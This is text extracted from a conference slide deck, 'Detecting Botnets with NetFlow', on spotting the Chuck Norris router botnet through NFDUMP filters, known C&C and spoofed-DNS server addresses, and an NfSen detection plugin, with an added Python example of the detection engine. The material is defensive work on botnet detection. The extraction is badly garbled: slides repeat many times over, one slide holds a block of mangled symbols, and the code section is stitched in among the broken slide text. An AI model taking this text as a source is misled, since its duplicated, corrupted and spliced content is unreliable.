Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2)
and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP)
and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
NFDUMP detection filter
(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or
(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4))
and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Botnet distribution sites detection
Botnet CampC centers detection
DNS spoofing attack detection
ADSL string detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Web Interface ndash Infected Host Detected
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 24 28
Part V
Conclusion
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 25 28
Detection Plugin and Other Botnets
Botnet Lifecycle Similar for Majority of Botnets
scanning for possible botsinfection of a vulnerable devicesbot initializationupdatebotnet operation
Botnet Detection Plugin Customization
modular plugin engineeasy modification for detection of other botnetwe need to customize detection methodsplugin distributed under the BSD license
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 26 28
ConclusionNetwork Devices Are Not Protected
Routers access points printers cameras TVs No AV software missing patches and firmware updatesBut they should be protected
ExperienceNetFlow can monitor all such devices in networkDiscovery of new Chuck Norris botnet using NetFlowDeveloped a specialized NfSen plugin for Chuck Norrisbotnet detection
FutureChuck Norris is down but others are coming (eg Stuxnet)We are open to research collaborationDetection plugin is available at our project site
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 27 28
Thank You For Your Attention
Vojtěch KrmiacutečekTomaacuteš Plesniacutekvojtec|plesnikicsmunicz
Project CYBERhttpwwwmuniczicscyber
Detecting Botnetswith NetFlow
This material is based upon work supported by theCzech Ministry of Defence under Contract No OVMASUN200801
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 28 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
NFDUMP detection filter
(src net local_network) and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2)
and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP)
and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
NFDUMP detection filter
(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or
(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4))
and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Plugin Architecture

[Diagram: plugin components]
BACKEND: cndet.pm, cndetdb.pm
FRONTEND: cndet.php
nfsend comm interface (communication between backend and frontend)
Data sources: NetFlow data, DNS, WHOIS db
Database: PostgreSQL
Plugin Methods Architecture

[Diagram: cndetdb.pm with its data sources and the detection methods built on it]
cndetdb.pm
PostgreSQL
Data sources: NetFlow data, DNS, WHOIS db
Detection methods:
Telnet scan detection
Botnet distribution sites detection
Botnet C&C centers detection
DNS spoofing attack detection
ADSL string detection
Web Interface – Infected Host Detected

Part V
Conclusion
Detection Plugin and Other Botnets

Botnet Lifecycle Similar for Majority of Botnets
scanning for possible bots
infection of a vulnerable device
bot initialization/update
botnet operation

Botnet Detection Plugin Customization
modular plugin engine
easy modification for detection of other botnets
we need to customize the detection methods
plugin distributed under the BSD license
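The plugin architecture slides (a backend engine driving several detection methods over NetFlow, DNS and WHOIS data and storing results in PostgreSQL) and the customization point above, as one added Python example; this is not the plugin's Perl code. sqlite3 stands in for PostgreSQL, the flow records are constructed, the local network and the telnet-scan threshold are assumed parameters, and TCP/80 for the distribution sites is an assumption (the slide gives web server addresses only). The indicator table uses the defaults from the "Detected Chuck Norris Servers" slide; adapting the engine to another botnet means supplying a different table or registering another method.

```python
import sqlite3
from collections import defaultdict
from dataclasses import dataclass
from ipaddress import ip_address, ip_network


@dataclass(frozen=True)
class Flow:            # minimal flow record; real input would come from nfdump
    src: str
    dst: str
    proto: str
    dport: int


@dataclass(frozen=True)
class Detection:
    method: str
    host: str
    detail: str


class DetectionMethod:
    """Every method names the data source it consumes ('netflow', 'dns' or 'whois')
    and returns Detection records; the engine does not know what a method looks for."""
    name = "base"
    source = "netflow"

    def detect(self, data, local_net):
        raise NotImplementedError


class TelnetScanDetection(DetectionMethod):
    name = "telnet_scan"

    def __init__(self, min_targets):   # threshold is an assumed parameter
        self.min_targets = min_targets

    def detect(self, flows, local_net):
        targets = defaultdict(set)     # local source -> distinct TCP/23 destinations
        for f in flows:
            if f.proto == "TCP" and f.dport == 23 and ip_address(f.src) in local_net:
                targets[f.src].add(f.dst)
        return [Detection(self.name, src, f"{len(t)} distinct telnet targets")
                for src, t in sorted(targets.items()) if len(t) >= self.min_targets]


class KnownServerContact(DetectionMethod):
    """Indicator-driven method: one class serves the distribution-site and C&C
    phases, and another botnet only needs another indicator table."""

    def __init__(self, name, servers, proto, dport):
        self.name, self.servers, self.proto, self.dport = name, set(servers), proto, dport

    def detect(self, flows, local_net):
        seen = {(f.src, f.dst) for f in flows
                if f.proto == self.proto and f.dport == self.dport
                and f.dst in self.servers and ip_address(f.src) in local_net}
        return [Detection(self.name, src, f"contacted {dst}:{self.dport}/{self.proto}")
                for src, dst in sorted(seen)]


class DetectionStore:
    """Stand-in for the database layer (cndetdb.pm): sqlite3 instead of PostgreSQL."""

    def __init__(self, path=":memory:"):
        self.db = sqlite3.connect(path)
        self.db.execute("CREATE TABLE IF NOT EXISTS detections "
                        "(method TEXT, host TEXT, detail TEXT, UNIQUE(method, host, detail))")

    def save(self, detections):
        self.db.executemany("INSERT OR IGNORE INTO detections VALUES (?, ?, ?)",
                            [(d.method, d.host, d.detail) for d in detections])
        self.db.commit()

    def infected_hosts(self):
        rows = self.db.execute("SELECT host, group_concat(method, ',') FROM detections "
                               "GROUP BY host ORDER BY host").fetchall()
        return {host: sorted(methods.split(",")) for host, methods in rows}


class Engine:
    """Stand-in for the backend engine (cndet.pm): runs each registered method
    over its data source and hands the results to the store for the frontend."""

    def __init__(self, local_net, store):
        self.local_net, self.store, self.methods = ip_network(local_net), store, []

    def register(self, method):
        self.methods.append(method)
        return self

    def run(self, sources):
        found = []
        for method in self.methods:
            found.extend(method.detect(sources[method.source], self.local_net))
        self.store.save(found)
        return found


# Default indicators from the "Detected Chuck Norris Servers" slide (TCP/80 assumed).
CHUCK_NORRIS_IOCS = {
    "distribution_site": {"servers": ["87.98.173.190", "87.98.163.86"], "proto": "TCP", "dport": 80},
    "cnc": {"servers": ["87.98.173.190", "87.98.163.86"], "proto": "TCP", "dport": 12000},
}


def build_engine(iocs=CHUCK_NORRIS_IOCS, local_net="10.0.0.0/8", min_scan_targets=3):
    """local_net and min_scan_targets are assumed values; the low threshold fits the sample."""
    engine = Engine(local_net, DetectionStore()).register(TelnetScanDetection(min_scan_targets))
    for name, ioc in iocs.items():
        engine.register(KnownServerContact(name, ioc["servers"], ioc["proto"], ioc["dport"]))
    return engine


SAMPLE_FLOWS = [   # constructed; 192.0.2.0/24 and 198.51.100.0/24 are documentation ranges
    *(Flow("10.1.2.3", f"192.0.2.{i}", "TCP", 23) for i in range(1, 6)),
    Flow("10.1.2.3", "87.98.173.190", "TCP", 12000),
    Flow("10.1.2.7", "87.98.163.86", "TCP", 80),
    Flow("10.1.2.9", "192.0.2.1", "TCP", 23),
    Flow("198.51.100.5", "87.98.173.190", "TCP", 12000),   # not in local_net: ignored
]


def demo():
    engine = build_engine()
    engine.run({"netflow": SAMPLE_FLOWS})
    return engine.store.infected_hosts()
```

Running `demo()` lists 10.1.2.3 under both `telnet_scan` and `cnc` and 10.1.2.7 under `distribution_site`; the single telnet flow from 10.1.2.9 stays below the threshold and the flow from outside the local network is out of scope. The `UNIQUE` constraint makes repeated runs over overlapping time windows idempotent, which matters for a plugin that NfSen invokes every five minutes.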
Conclusion

Network Devices Are Not Protected
Routers, access points, printers, cameras, TVs, ...
No AV software, missing patches and firmware updates
But they should be protected

Experience
NetFlow can monitor all such devices in the network
Discovery of the new Chuck Norris botnet using NetFlow
Developed a specialized NfSen plugin for Chuck Norris botnet detection

Future
Chuck Norris is down but others are coming (e.g. Stuxnet)
We are open to research collaboration
Detection plugin is available at our project site
Thank You For Your Attention

Vojtěch Krmíček, Tomáš Plesník
{vojtec|plesnik}@ics.muni.cz
Project CYBER: http://www.muni.cz/ics/cyber

Detecting Botnets with NetFlow

This material is based upon work supported by the Czech Ministry of Defence under Contract No. OVMASUN200801
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and (dst ip IRC_server 2) and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2)
and(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP)
and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
Connections to Botnet CampC Center ndash Phase III
Botrsquos IRC traffic with command and control center
localnetwork
infecteddevice
botnetCampCserver
TCP1200SYNACK flags
NFDUMP detection filter(src net local_network) and (dst ip IRC_server 2) and
(dst port 1200) and (proto TCP) and (flags SA and not flag R)
2IP address of an attackerrsquos IRC server (Botnet CampC center)Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 16 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
NFDUMP detection filter
(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
NFDUMP detection filter(src net local_network)
and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or
(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4))
and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
DNS Spoofing Attack Detection ndash Phase IV
Attackerrsquos DNS or OpenDNS Queries
Common DNS requests forwardedto OpenDNS serversTargeted DNS requests forwardedto attackerrsquos spoofed DNS
DNS Queries Outside Local Network
Used for Phishing Attacks
Eg Facebook or banking sites
localnetwork
infecteddevice
OpenDNSserver
spoofedDNS server
UDP53
NFDUMP detection filter(src net local_network) and ((dst ip OpenDNS servers3) or(dst ip DNS servers4)) and (proto UDP) and (dst port 53)
3IP addresses of a common OpenDNS servers4IP addresses of a spoofed attackerrsquos DNS servers
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 17 28
ADSL String Detection
Looking for ADSL String
ADSL string indicates Chuck Norris botnetSearching in victimrsquos hostname or victimrsquos WHOISQuering DNS server and parsing recieved hostnameQuering WHOIS database and parsing recieved info
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 18 28
+
13131313
$amp()+--amp130+(amp0(131$2 13133+13133++ampamp45(331+605+70138913$13+-
amp3133+913($2-+(-amp3 lt$$2 2=gtlt$$21313913$+7013+-
1313130 $ 0$1
adsl
196192572
Detected Chuck Norris Servers
Known IP Addresses
Web server addresses 8798173190 879816386IRC server addresses 8798173190 879816386IRC server port 12000OpenDNS server addresses 2086722222220867220220Spoofed DNS server 879816386
This data is used in detection methods by default
IP addresses updates are published at project page
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 19 28
Part IV
NfSen Botnet Detection Plugin
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 20 28
Botnet Detection Plugin
Plugin Features
Detects Chuck Norris-like botnet behaviorBased on NetFlow and other network data sourcesProcesses data regularly and provides real-time output
Plugin Architecture
Compliant with NfSen plugins architecture recommendationsPHP frontend with a Perl backend and a PostgreSQL DBWeb e-mail and syslog detection output and reporting
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 21 28
Plugin Architecture
BACKEND FRONTEND
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Architecture
BACKEND FRONTEND
cndetpm cndetphp
nfsend
comm
interface
cndetdbpm
NetFlow data DNS WHOIS db
PostgreSQL
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 22 28
Plugin Methods Architecture
cndetdbpm
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
cndetdbpm
PostgreSQL
NetFlow data
DNS
WHOIS db
Telnet scan detection
Krmiacuteček Plesniacutek Detecting Botnets with NetFlow 23 28
Plugin Methods Architecture
